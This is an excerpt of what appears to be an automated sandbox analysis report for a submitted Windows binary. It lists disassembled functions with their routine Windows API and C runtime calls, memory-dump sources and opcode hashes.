                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                              • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                              • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                              • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                              Function 0043362D Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                              • GetStockObject.GDI32(00000011), ref: 00433695
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                              • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateMessageObjectSendShowStock
                                                                              • String ID:
                                                                              • API String ID: 1358664141-0
                                                                              • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                              • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                              • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                              • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                              Function 0044419B Relevance: 6.1, APIs: 4, Instructions: 53synchronizationthreadwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 2880819207-0
                                                                              • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                              • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                              • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                              • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                              Function 0043401C Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 00434037
                                                                              • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                              • ScreenToClient.USER32(?,?), ref: 00434085
                                                                              • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                              • String ID:
                                                                              • API String ID: 357397906-0
                                                                              • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                              • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                              • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                              • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                              Function 00424E33 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                              • String ID:
                                                                              • API String ID: 3016257755-0
                                                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                              • Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
                                                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                              • Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
                                                                              Function 00436A1D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __wsplitpath.LIBCMT ref: 00436A45
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • __wsplitpath.LIBCMT ref: 00436A6C
                                                                              • __wcsicoll.LIBCMT ref: 00436A93
                                                                              • __wcsicoll.LIBCMT ref: 00436AB0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                              • String ID:
                                                                              • API String ID: 1187119602-0
                                                                              • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                              • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                              • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                              • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                              Function 00437AFE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1597257046-0
                                                                              • Opcode ID: 89f1a50a5f3f04ab4eb1e3bf6fc47514f3819a61a53c7cc8dd854e7388be254d
                                                                              • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                              • Opcode Fuzzy Hash: 89f1a50a5f3f04ab4eb1e3bf6fc47514f3819a61a53c7cc8dd854e7388be254d
                                                                              • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                              Function 004555D6 Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteDestroyObject$IconWindow
                                                                              • String ID:
                                                                              • API String ID: 3349847261-0
                                                                              • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                              • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                              • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                              • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                              Function 0044B600 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                              • String ID:
                                                                              • API String ID: 2223660684-0
                                                                              • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                              • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                              • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                              • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                              Function 00447268 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                              • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                              • EndPath.GDI32(?), ref: 004472B0
                                                                              • StrokePath.GDI32(?), ref: 004472BE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                              • String ID:
                                                                              • API String ID: 2783949968-0
                                                                              • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                              • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                              • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                              • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                              Function 00417D0E Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 00417D1A
                                                                                • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                              • __getptd.LIBCMT ref: 00417D31
                                                                              • __amsg_exit.LIBCMT ref: 00417D3F
                                                                              • __lock.LIBCMT ref: 00417D4F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                              • String ID:
                                                                              • API String ID: 3521780317-0
                                                                              • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                              • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                                                              • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                              • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                                                              Function 00471144 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDesktopWindow.USER32 ref: 00471144
                                                                              • GetDC.USER32(00000000), ref: 0047114D
                                                                              • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                              • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 2889604237-0
                                                                              • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                              • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                              • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                              • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                              Function 00471102 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDesktopWindow.USER32 ref: 00471102
                                                                              • GetDC.USER32(00000000), ref: 0047110B
                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                              • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 2889604237-0
                                                                              • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                              • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                              • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                              • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                              Function 004389A1 Relevance: 6.0, APIs: 4, Instructions: 27threadwindowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                              • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                              • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 2710830443-0
                                                                              • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                              • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                              • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                              • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                                              Function 004390C2 Relevance: 6.0, APIs: 4, Instructions: 26synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                              • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                              • String ID:
                                                                              • API String ID: 146765662-0
                                                                              • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                              • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                              • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                              • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                              Function 0041405D Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                                                • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                              • __getptd_noexit.LIBCMT ref: 00414080
                                                                              • __freeptd.LIBCMT ref: 0041408A
                                                                              • ExitThread.KERNEL32 ref: 00414093
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 3182216644-0
                                                                              • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                              • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                                              • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                              • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
